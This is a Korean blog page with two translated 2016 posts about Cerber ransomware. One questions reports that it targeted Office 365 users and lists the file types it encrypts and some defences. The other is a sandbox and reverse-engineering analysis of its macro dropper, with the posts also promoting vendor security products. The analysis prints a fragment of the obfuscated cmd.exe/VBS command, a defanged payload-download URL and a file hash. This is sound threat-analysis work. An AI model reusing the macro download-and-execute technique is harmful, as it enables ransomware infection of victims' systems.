오피스365에 해당하는글 2



근래 Cerber 랜섬웨어가 오피스365를 노린다고 하여 큰 주목을 받았는데 그 실상은 흔히 알려진 내용과는 약간 다르다. Cerber 랜섬웨어가 오피스365를 공격했다는 내용이 최초로 등장한 출처는 보안업체 Avanan의 웹사이트에 Steven Toole이 게재한 글이며 그 내용을 보면 "제로데이 랜섬웨어 바이러스의 대규모 공격에 오피스365 기업사용자들이 노출됐다"고 기술하고 있다.


<참고: 랜섬웨어 차단 AVG 안티바이러스>


그런데 사실 여기에서 언급된 "대규모 공격"이란 Avana 고객 중 오피스365 사용자를 대상으로 한 공격으로 가리키며 오피스365와는 직접 관련이 없는 Avanan 메시지보안플랫폼을 통해 탐지됐다. Cerber가 등장한 이후 몇 시간 지나지 않아 마이크로소프트, 구글, 시만텍, 아바스트, 맥아피 등 수많은 보안업체들이 이 랜섬웨어를 포착했으며 실제로 이 랜섬웨어로 인해 피해를 입은 사용자가 얼마 없다는 점을 생각한다면 이번 Avanan 공격사례가 대규모였다고이유는 없으며 오피스365 사용자만을 특별히 노린 경우도 아니다. 예를 들어 마이크로소프트의 경우 오피스365를 사용하는 고객이 수십만에 달하지만 Avanan의 클라우드보안플랫폼을 사용하는 고객이 몇 명인지는 알 수 없다. Avanan 측에서는 전체 고객의 57%라는 수치를 제시했으나 전체 고객 수를 알지 못하는 이상 이는 의미가 없는 수치다.


참고로 Cerber 랜섬웨어가 노리는 파일유형은 다음과 같다.

.gif, .groups, .hdd, .hpp, .log, .m2ts, .m4p, .mkv, .mpeg, .ndf, .nvram, .ogg, .ost, .pab, .pdb, .pif, .png, .qed, .qcow, .qcow2, .rvt, .st7, .stm, .vbox, .vdi, .vhd, .vhdx, .vmdk, .vmsd, .vmx, .vmxf, .3fr, .3pr, .ab4, .accde, .accdr, .accdt, .ach, .acr, .adb, .advertisements, .agdl, .ait, .apj, .asm, .awg, .back, .backup, .backupdb, .bay, .bdb, .bgt, .bik, .bpw, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .ce1, .ce2, .cib, .craw, .crw, .csh, .csl, .db_journal, .dc2, .dcs, .ddoc, .ddrw, .der, .des, .dgc, .djvu, .dng, .drf, .dxg, .eml, .erbsql, .erf, .exf, .ffd, .fh, .fhd, .gray, .grey, .gry, .hbk, .ibd, .ibz, .iiq, .incpas, .jpe, .kc2, .kdbx, .kdc, .kpdx, .lua, .mdc, .mef, .mfw, .mmw, .mny, .mrw, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nwb, .nx2, .nxl, .nyf, .odb, .odf, .odg, .odm, .orf, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pdd, .pem, .plus_muhd, .plc, .pot, .pptx, .psafe3, .py, .qba, .qbr, .qbw, .qbx, .qby, .raf, .rat, .raw, .rdb, .rwl, .rwz, .s3db, .sd0, .sda, .sdf, .sqlite, .sqlite3, .sqlitedb, .sr2, .srf, .srw, .st5, .st8, .std, .sti, .stw, .stx, .sxd, .sxg, .sxi, .sxm, .tex, .wallet, .wb2, .wpd, .x11, .x3f, .xis, .ycbcra, .yuv, .contact, .dbx, .doc, .docx, .jnt, .jpg, .msg, .oab, .ods, .pdf, .pps, .ppsm, .ppt, .pptm, .prf, .pst, .rar, .rtf, .txt, .wab, .xls, .xlsx, .xml, .zip, .1cd, .3ds, .3g2, .3gp, .7z, .7zip, .accdb, .aoi, .asf, .asp, .aspx, .asx, .avi, .bak, .cer, .cfg, .class, .config, .css, .csv, .db, .dds, .dwg, .dxf, .flf, .flv, .html, .idx, .js, .key, .kwm, .laccdb, .ldf, .lit, .m3u, .mbx, .md, .mdf, .mid, .mlb, .mov, .mp3, .mp4, .mpg, .obj, .odt, .pages, .php, .psd, .pwm, .rm, .safe, .sav, .save, .sql, .srt, .swf, .thm, .vob, .wav, .wma, .wmv, .xlsb,3dm, .aac, .ai, .arw, .c, .cdr, .cls, .cpi, .cpp, .cs, .db3, .docm, .dot, .dotm, .dotx, .drw, .dxb, .eps, .fla, .flac, .fxg, .java, .m, .m4v, .max, .mdb, .pcd, .pct, .pl, .potm, .potx, .ppam, .ppsm, .ppsx, .pptm, .ps, .r3d, .rw2, .sldm, .sldx, .svg, .tga, .wps, .xla, .xlam, .xlm, .xlr, .xlsm, .xlt, .xltm, .xltx, .xlw, .act, .adp, .al, .bkp, .blend, .cdf, .cdx, .cgm, .cr2, .crt, .dac, .dbf, .dcr, .ddd, .design, .dtd, .fdb, .fff, .fpx, .h, .iif, .indd, .jpeg, .mos, .nd, .nsd, .nsf, .nsg, .nsh, .odc, .odp, .oil, .pas, .pat, .pef, .pfx, .ptx, .qbb, .qbm, .sas7bdat, .say, .st4, .st6, .stc, .sxc, .sxw, .tlg, .wad, .xlk, .aiff, .bin, .bmp, .cmt, .dat, .dit, .edb, .flvv



랜섬웨어 대응대책


GFI LanGuard과 같은 보안솔루션으로 시스템 패치와 업데이트를 자동화하여 취약점 발생가능성을 줄인다.


<참고: GFI LanGuard 네트워크보안솔루션>


•  엔드포인트 그리고 데이터가 거쳐가는 중간시스템에서 안타바이러스 소프트웨어를 구동한다.


•  GFI MailEssential과 같이 여러 안티바이러스 엔진을 동시에 구동하는 이메일보안 솔루션을 사용하거나 다양한 업체의 솔루션을 병렬적으로 사용하여 보안대책을 다층화한다.


<참고: GFI MailEssential 이메일보안솔루션>


• 오피스365 사용자의 경우 Advanced Threat Protection 서비스를 구독할 수 있으며 다른 제품군을 사용한다면 이와 유사한 기능을 사용하거나 제품군 자체의 변경을 고려한다. SPF, DKIM, DMARC 등의 필터링을 적용하고 이를 통과하지 못하는 경우는 차단하며 파트너 또한 이러한 정책을 채택하도록 한다.


•  중요데이터는 백업시키고 맬웨어 감염가능성을 차단하기 위해 해당 백업은 엔드포인트로부터 격리시킨다.




Casper Manes, Ransomware FUD strikes again, this time against Office 365, 7. 19. 2016.

http://www.gfi.com/blog/ransomware-fud-strikes-again-this-time-against-office-365/


번역⋅요약: madfox




참고링크 


<유료안티바이러스 제품비교>

COMMENT : 0 TRACKBACK : 0

날짜

2016.07.22 15:03

최근 수많은 오피스365 사용자들이 제로데이공격의 피해를 받은 사례가 보고됐으며 그 배후에는 올해 초에 발견된 Cerber 랜섬웨어의 신형 변종이 있었다. 최근 독버섯처럼 번지고 있는 다른 제로데이 위협과 마찬가지로 이 변종 랜섬웨어 역시 오피스 매크로의 취약점을 악용함으로써 감염을 실행한다여기에서는 역설계(reverse engineering) 기법과 ThreatTrack 최신 맬웨어분석 샌드박스 솔루션 ThreatAnalyzer 6.1을 통해 본 Cerber 랜섬웨어 변종을 분석한 결과를 소개한다.


<참고: ThreatAnalyzer 맬웨어분석 샌드박스>

 

 

분석과정

 

역설계 기법은 분석대상이 어떤 목적을 가지고 행동하는지에 대한 보다 종합적인 판단이 요구된다. 어떤 맬웨어 샘플을 분석하거나 혹은 난독화(obfuscate)된 코드에서 어떤 함수가 무슨 기능을 하는지 알아내려 할 때 상세한 내용을 조사하기에 앞서 분석대상이 풍기는 전반적인 분위기를 포착할 수 있어야 한다.

 

ThreatAnalyzer는 샌드박스 솔루션으로 프로그램, 파일, URL을 통제 및 감시되는 환경 내에서 실행하고 이에 대한 상세보고서를 생성하여 연구분석 인력이 해당 샘플의 정확한 행동양상을 판단할 수 있도록 돕는 역할을 한다. 샌드박스는 피해징후(indicator of compromise, IOC)를 빠르게 포착하기 위한 위협정보 생성에 적합한 솔루션이다ThreatAnalyzer 6.1ThreatTrack이 선보이는 최신 샌드박스로 행동탐지 메커니즘을 내장하여 대상 샘플의 전체적인 행동양상을 판단하고 이러한 행동양상을 토대로 해당 샘플이 악성인지 무해한지 예측할 수 있다.

 



위 그림을 보면 ThreatAnalyzer 6.1이 본 샘플에 대해 다음과 같은 중요 정보를 생성했음을 볼 수 있다.

 

1. 3개 항목에 따라 대상샘플을 악성으로 판단

(1) ThreatTrack 통합 위협정보 데이터베이스 ThreatIQ 관측결과 대상샘플이 차단된 URL에 접근 시도

(2) 1개 이상의 안티바이러스 엔진이 대상샘플을 감지

(3) 대상샘플의 행동양상 판단결과 악성일 가능성이 높음

2. 레지스트리 변경, 파일 입출력(IO), 네트워크 접근시도와 이에 따른 프로세스 내용을 분석가/사용자에게 제공

3. 분석결과 수집된 상세정보를 다운로드 가능한 PDF 또는 XML 형식 보고서로 생성. 사용자는 선택에 따라 상세보고서, 생성된 중요파일, 새롭게 열린 창에 대한 스크린샷, 네트워크 활동내역을 기록한 PCAP 파일 사본 등이 포함된 자료를 다운받을 수 있다.

 

ThreatAnalyzer는 사용자가 분석한 샘플에 대한 상세보고서를 XML, JSON, PDF 형식으로 제공한다. 여기에는 생성된 프로세스, 생성/변경/접근된 파일, 변경된 레지스트리, 생성된 오브젝트, 네트워크 접속내역 등의 내용이 포함된다.

 

본 샘플에 관련된 XML 파일을 상세히 살펴보면 다음과 같은 활동내역을 볼 수 있다.

WINWORD.EXE 프로세스 생성(분석과정에서 DOTM 파일을 주입했으므로 예상된 결과), 프로세스 트리를 보면 생성된 프로세스는 다음과 같다,/

exe

exe

임의의 이름이 지정된 VBS 파일을 %appdata% 디렉토리에 다음과 같이 생성 - %appdata%\15339.vbs

VBS 파일을 요청하는 cmd.exe 프로세스 생성

exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()”

다음 URL에 대한 접속 시도

httx://solidaritedeproximite.org/mhtr.jpg

임의의 이름이 지정된 .TMP 파일을 %appdata% 디렉토리에 생성하고 실행 - 해시값: ee0828a4e4c195d97313bfc7d4b531f1

 

이상의 분석결과는 단순한 오피스 문서파일에 대한 분석결과임을 볼 때 대단히 수상한 행동양상에 해당하며 이를 정상이라고 판단하기는 어렵다그러므로 원래 아는 사람이나 기관이 보낸 첨부물이라 해도 조금이라도 의심이 되는 경우라면 본 시스템에 받기에 앞서 ThreatAnalyzer와 같은 샌드박스를 통해 실행시켜 보는 게 좋다.

 

 

역설계


 


본 랜섬웨어의 코드를 분석해 보면 오피스 365 외에 오피스 2007 이상 버전에서도 작동함을 알 수 있다. 악성 오피스 첨부물을 열 경우 Document_Open 함수 내부의 매크로가 자동 실행된다. 다만 이는 매크로가 허용된 경우, 혹은 이전 버전의 오피스에서는 보안수준이 낮음으로 설정된 경우에만 해당된다. 또한 Cerber 매크로 변종의 각 연산은 난독화돼 있는데 이는 분석과정을 지연시키고 기존 안티바이러스의 시그내쳐 탐지를 우회하려는 수법일 가능성이 높다.


 

자동 실행된 매크로는 %appdata%VBS 스크립트를 생성하게 된다. VBS 파일 또한 난독화 처리됐으나 암호화되진 않았다여기에서 행동탐지를 회피하려는 의도가 있을 수도 있고 없을 수도 있는 흥미로운 행동양상이 관측된다. 매크로는 Timer 함수를 통해 임의의 정수가 생성하고 이를 자체 생성한 변수와 비교하는데 이는 코드가 암호화 구성요소를 다운로드하는 시점을 결정하게 된다. 그리고 나서 VBS 내장 네트워크 기능을 통해 원격서버에 접속하여 다음 파일의 다운로드를 시도하게 된다. 위 파일은 단순한 JPG 파일이라서 무해해 보일 수도 있지만 위 VBS 코드를 보면 이 JPG 파일의 내용을 %appdata%.TMP 형식으로 저장하고 실행시킨다는 점을 알 수 있다. 이 수법은 사실 오래 전부터 다른 맬웨어가 이미 사용했던 구식 수법이라서 이목을 끈다.

 


다은로드된 구성요소의 MD5 해시값: ee0828a4e4c195d97313bfc7d4b531f1 


이 파일은 Cerber 랜섬웨어의 암호화 구성요소로 피해대상 시스템의 목표파일을 스캔 및 암호화한다. 이 구성요소에 대한 전체 분석결과는 별도의 글에서 다룬다. 흥미로운 점은 이렇게 다운로드된 Cerber 실행파일이 인터넷 연결이 끊어진 경우에도 파일 암호화를 실행한다는 데 있다. EXE 내부 코드를 보면 CrytoWall, Locky, Teslacrypt 등 다른 랜섬웨어와 달리 파일 암호화를 위해 원격서버에 접속하려는 시도를 하지 않는다는 점을 알 수 있다.

 

시스템 감염이 완료되면 바탕화면에 아래 그림과 같은 메시지가 표시된다.


 

그리고 웹브라우저를 통해 아래 그림과 같이 메시지가 표시된다.


 

그리고 로봇 음성을 통해 “your documents, photos, databases, and other important files have been encrypted” 라는 메시지를 재생하기도 한다.

 

 

감염과정 요약

1. 악성 오피스 첨부물을 포함한 스피어피싱 메일 도달

2. 사용자가 이메일을 열고 첨부물을 실행시켰을 때 오피스 매크로가 허용된 상태라면 매크로를 실행되어 별도의 VBS 스크립트가 생성됨

3. 스크립트가 원격서버에 접속하여 Cerber 랜섬웨어 암호화 구성요소를 다운받아 실행시킴

4. 사용자 파일을 스캔하고 암호화

5. 사용자 시스템이 Cerber에 감염됐다는 메시지 표시


 

 


ThreatTrack Security Labs, A Look at the Cerber Office 365 Ransomware, 7. 13. 2016.

https://blog.threattrack.com/closer-look-cerber-office-365-attack/

 

번역: madfox




참고링크 


<유료안티바이러스 제품비교>

COMMENT : 0 TRACKBACK : 0

날짜

2016.07.15 15:44

위로가기